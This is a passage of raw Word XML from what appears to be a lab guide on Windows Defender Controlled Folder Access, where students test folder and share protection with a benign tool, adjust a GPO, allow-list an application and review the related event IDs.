        <w:t xml:space="preserve">You should have CFAtool.exe in C:\Hack or if you map </w:t>
      </w:r>
      <w:r w:rsidRPr="003C3F18">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Lab_Tools_v2.iso</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> in VICTIM-PC </w:t>
      </w:r>
      <w:r w:rsidR="00D81438">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF0B89E" w14:textId="0D22A3E5" w:rsidR="00D1539E" w:rsidRDefault="00522984" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="003C3F18">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>See more</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:hyperlink r:id="rId73" w:history="1">
        <w:r w:rsidR="00D1539E" w:rsidRPr="00FF6E33">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:rFonts w:cs="Segoe UI"/>
          </w:rPr>
          <w:t>https://demo.wd.microsoft.com/Page/CFA2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D287591" w14:textId="77777777" w:rsidR="00522984" w:rsidRDefault="00522984" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38A75198" w14:textId="4F3D93F6" w:rsidR="00D1539E" w:rsidRDefault="00522984" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">On VICTIM-PC, run the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>CFAtool.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> and create </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>TestFile.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> file in </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>C:\_TOOLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08622614" w14:textId="7C0C1A8D" w:rsidR="00522984" w:rsidRDefault="00522984" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Run a second time the </w:t>
      </w:r>
      <w:r w:rsidR="00E35AFF">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">CFATool.exe and create TestFile.txt file in </w:t>
      </w:r>
      <w:r w:rsidR="00E35AFF" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>C:\WorkFolder</w:t>
      </w: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E35AFF" w14:paraId="3815F458" w14:textId="77777777" w:rsidTr="0055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00437CC3" w14:textId="77777777" w:rsidR="00E35AFF" w:rsidRDefault="00E35AFF" w:rsidP="00554E9A">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E35AFF" w14:paraId="1C4373A8" w14:textId="77777777" w:rsidTr="0055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FBDEFC" w14:textId="77777777" w:rsidR="00E35AFF" w:rsidRDefault="00E35AFF" w:rsidP="00554E9A">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>In which folder the TestFile.txt is created?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D4BB3F4" w14:textId="3902BB95" w:rsidR="00E35AFF" w:rsidRDefault="00E35AFF" w:rsidP="00554E9A">
            <w:r>
              <w:t>Find event that indicate the deny for file creation from CFAtool.exe and copy/paste this event.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77638BA1" w14:textId="135066F9" w:rsidR="00E35AFF" w:rsidRDefault="00E35AFF" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E8B0D11" w14:textId="6A83F016" w:rsidR="007E43D3" w:rsidRDefault="007E43D3" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="629E6CE8" w14:textId="77777777" w:rsidR="007E43D3" w:rsidRDefault="007E43D3" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6995A1C5" w14:textId="1B2AF81B" w:rsidR="00E35AFF" w:rsidRPr="00C6425D" w:rsidRDefault="00AF13F0" w:rsidP="00AF13F0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Hlk528190843"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Protect Share</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="64"/>
    <w:p w14:paraId="5A7CEFC9" w14:textId="7BF3B03B" w:rsidR="00AF13F0" w:rsidRDefault="00554E9A" w:rsidP="00AF13F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify you </w:t>
      </w:r>
      <w:r w:rsidR="00D32C41">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> create file in share </w:t>
      </w:r>
      <w:hyperlink r:id="rId74" w:history="1">
        <w:r w:rsidR="00FE0027" w:rsidRPr="00FE0027">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:rFonts w:cs="Segoe UI"/>
          </w:rPr>
          <w:t>\\victim-srv.contoso.lab\CONFIDENTIAL</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F107894" w14:textId="7176C109" w:rsidR="00554E9A" w:rsidRDefault="00D32C41" w:rsidP="00AF13F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Modify the CFA GPO to protect share.</w:t>
      </w:r>
      <w:r w:rsidR="00FE0027">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> Force the GPO application on VICTIM-PC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087E6B54" w14:textId="1562F06A" w:rsidR="00FE0027" w:rsidRPr="00C6425D" w:rsidRDefault="00FE0027">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Then tries to create TestFile.txt using CFATool.exe in </w:t>
      </w:r>
      <w:hyperlink r:id="rId75" w:history="1">
        <w:r w:rsidRPr="006B454B">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:rFonts w:cs="Segoe UI"/>
          </w:rPr>
          <w:t>\\victim-srv.contoso.lab\CONFIDENTIAL</w:t>
        </w:r>
      </w:hyperlink>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FE0027" w14:paraId="679904F8" w14:textId="77777777" w:rsidTr="00B2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1A4F19AF" w14:textId="77777777" w:rsidR="00FE0027" w:rsidRDefault="00FE0027" w:rsidP="00B261DC">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE0027" w14:paraId="331BA5C3" w14:textId="77777777" w:rsidTr="00B26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4609959" w14:textId="3E6FB218" w:rsidR="00FE0027" w:rsidRDefault="00FE0027" w:rsidP="00B261DC">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="65" w:name="_Hlk528191630"/>
            <w:r>
              <w:t>Take a screenshot of the GPO settings you have modified to protect the share.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38E7E3D1" w14:textId="77777777" w:rsidR="00FE0027" w:rsidRDefault="00FE0027" w:rsidP="00B261DC">
            <w:r>
              <w:t>Find event that indicate the deny for file creation from CFAtool.exe and copy/paste this event.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="65"/>
    </w:tbl>
    <w:p w14:paraId="7D7DA9C2" w14:textId="58E680AB" w:rsidR="00AF13F0" w:rsidRDefault="00AF13F0" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DE31071" w14:textId="3E7BBA6F" w:rsidR="00AF13F0" w:rsidRDefault="00FE0027" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>More information about events related to Exploit Guard:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10356" w:type="dxa"/>
        <w:tblCellSpacing w:w="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966"/>
        <w:gridCol w:w="50"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE0027" w:rsidRPr="00DC44F5" w14:paraId="5B3B0BF4" w14:textId="77777777" w:rsidTr="00C6425D">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="5" w:type="dxa"/>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2295" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="032F4CDB" w14:textId="77777777" w:rsidR="00FE0027" w:rsidRPr="00DC44F5" w:rsidRDefault="00FE0027" w:rsidP="00B261DC">
            <w:pPr>
              <w:spacing w:after="0" w:line="384" w:lineRule="auto"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC44F5">
              <w:rPr>
                <w:b/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Event ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7936" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48A41EB6" w14:textId="77777777" w:rsidR="00FE0027" w:rsidRPr="00DC44F5" w:rsidRDefault="00FE0027" w:rsidP="00B261DC">
            <w:pPr>
              <w:spacing w:after="0" w:line="384" w:lineRule="auto"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC44F5">
              <w:rPr>
                <w:b/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE0027" w:rsidRPr="00DC44F5" w14:paraId="6634CE0A" w14:textId="77777777" w:rsidTr="00C6425D">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="5" w:type="dxa"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2295" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03466656" w14:textId="77777777" w:rsidR="00FE0027" w:rsidRPr="00DC44F5" w:rsidRDefault="00FE0027" w:rsidP="00B261DC">
            <w:pPr>
              <w:spacing w:after="0" w:line="384" w:lineRule="auto"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC44F5">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>5007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7936" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3ED0AACA" w14:textId="77777777" w:rsidR="00FE0027" w:rsidRPr="00DC44F5" w:rsidRDefault="00FE0027" w:rsidP="00B261DC">
            <w:pPr>
              <w:spacing w:after="0" w:line="384" w:lineRule="auto"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC44F5">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Event when settings are changed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE0027" w:rsidRPr="00DC44F5" w14:paraId="6545F23D" w14:textId="77777777" w:rsidTr="00C6425D">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="5" w:type="dxa"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2295" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12D1517E" w14:textId="77777777" w:rsidR="00FE0027" w:rsidRPr="00DC44F5" w:rsidRDefault="00FE0027" w:rsidP="00B261DC">
            <w:pPr>
              <w:spacing w:after="0" w:line="384" w:lineRule="auto"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC44F5">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1124</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7936" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03300BEB" w14:textId="77777777" w:rsidR="00FE0027" w:rsidRPr="00DC44F5" w:rsidRDefault="00FE0027" w:rsidP="00B261DC">
            <w:pPr>
              <w:spacing w:after="0" w:line="384" w:lineRule="auto"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC44F5">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Audited Controlled folder access event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE0027" w:rsidRPr="00DC44F5" w14:paraId="4DECE3D8" w14:textId="77777777" w:rsidTr="00C6425D">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="5" w:type="dxa"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2295" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="476AED06" w14:textId="77777777" w:rsidR="00FE0027" w:rsidRPr="00DC44F5" w:rsidRDefault="00FE0027" w:rsidP="00B261DC">
            <w:pPr>
              <w:spacing w:after="0" w:line="384" w:lineRule="auto"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC44F5">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1123</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7936" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C13C802" w14:textId="77777777" w:rsidR="00FE0027" w:rsidRPr="00DC44F5" w:rsidRDefault="00FE0027" w:rsidP="00B261DC">
            <w:pPr>
              <w:spacing w:after="0" w:line="384" w:lineRule="auto"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC44F5">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Blocked Controlled folder access event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE0027" w:rsidRPr="00DC44F5" w14:paraId="01A0EFEA" w14:textId="77777777" w:rsidTr="00C6425D">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="5" w:type="dxa"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2295" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13EDBDB2" w14:textId="77777777" w:rsidR="00FE0027" w:rsidRPr="00DC44F5" w:rsidRDefault="00FE0027" w:rsidP="00B261DC">
            <w:pPr>
              <w:spacing w:after="0" w:line="384" w:lineRule="auto"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC44F5">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1127</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7936" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2293228B" w14:textId="77777777" w:rsidR="00FE0027" w:rsidRPr="00DC44F5" w:rsidRDefault="00FE0027" w:rsidP="00B261DC">
            <w:pPr>
              <w:spacing w:after="0" w:line="384" w:lineRule="auto"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC44F5">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Blocked Controlled folder access sector write block event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE0027" w:rsidRPr="00DC44F5" w14:paraId="60897EAE" w14:textId="77777777" w:rsidTr="00C6425D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2295" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16208714" w14:textId="77777777" w:rsidR="00FE0027" w:rsidRPr="00DC44F5" w:rsidRDefault="00FE0027" w:rsidP="00B261DC">
            <w:pPr>
              <w:spacing w:after="0" w:line="384" w:lineRule="auto"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC44F5">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1128</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7971" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78EABE0A" w14:textId="77777777" w:rsidR="00FE0027" w:rsidRPr="00DC44F5" w:rsidRDefault="00FE0027" w:rsidP="00B261DC">
            <w:pPr>
              <w:spacing w:after="0" w:line="384" w:lineRule="auto"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC44F5">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Audited Controlled folder access sector write block event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BAC11B0" w14:textId="77777777" w:rsidR="00FE0027" w:rsidRDefault="00FE0027" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A38438" w14:textId="0725C9A7" w:rsidR="00AF13F0" w:rsidRDefault="003E7C8C" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: all protected folders list is stored in registry: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>ProtectedFolders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6770BD3B" w14:textId="6B186DAD" w:rsidR="00AF13F0" w:rsidRDefault="00AF13F0" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="122B7798" w14:textId="3AEB1244" w:rsidR="00E44F73" w:rsidRPr="00C6425D" w:rsidRDefault="00E44F73" w:rsidP="00E44F73">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Hlk528192120"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>How to make application (CFAtool.exe) “trusted” so that it can write to protected folders?</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="66"/>
    <w:p w14:paraId="127DFC66" w14:textId="33625227" w:rsidR="00DF3BA5" w:rsidRDefault="00DF3BA5" w:rsidP="00DF3BA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Modify CFA GPO to configure “Configure allowed applications” like screenshot bellow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67289058" w14:textId="34433CBD" w:rsidR="00E44F73" w:rsidRDefault="00DF3BA5" w:rsidP="00DF3BA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF3BA5">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="180FF7DA" wp14:editId="37A43219">
            <wp:extent cx="4343623" cy="40388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623" cy="4038808"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9F8948" w14:textId="730300CC" w:rsidR="00DF3BA5" w:rsidRPr="00C6425D" w:rsidRDefault="00DF3BA5" w:rsidP="00DF3BA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Do a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>gpupdate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> /force.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF3BA6A" w14:textId="3AAA1E9F" w:rsidR="00DF3BA5" w:rsidRPr="00C6425D" w:rsidRDefault="00DF3BA5" w:rsidP="00C6425D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableauListe4-Accentuation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FB7B13" w14:paraId="50D27305" w14:textId="77777777" w:rsidTr="00B2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tcPr>
          <w:p w14:paraId="61428AC4" w14:textId="77777777" w:rsidR="00FB7B13" w:rsidRDefault="00FB7B13" w:rsidP="00B261DC">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB7B13" w14:paraId="6EDEDBB3" w14:textId="77777777" w:rsidTr="00B26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46E8487" w14:textId="07166507" w:rsidR="00FB7B13" w:rsidRDefault="00FB7B13">
            <w:r>
              <w:t>Can you</w:t>
            </w:r>
            <w:r w:rsidRPr="00FB7B13">
              <w:t xml:space="preserve"> create a TestFile.txt in \\victim-srv.contoso.lab\CONFIDENTIAL and C: \</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FB7B13">
              <w:t>WorkFolder</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FB7B13">
              <w:t xml:space="preserve"> ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23347F9C" w14:textId="1D3ABF2B" w:rsidR="00AF13F0" w:rsidRDefault="00AF13F0" w:rsidP="00DF3BA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C49834" w14:textId="370CA78E" w:rsidR="00D43F61" w:rsidRDefault="00D43F61" w:rsidP="00DF3BA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B84C454" w14:textId="2887709E" w:rsidR="00D43F61" w:rsidRDefault="00D43F61" w:rsidP="00DF3BA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
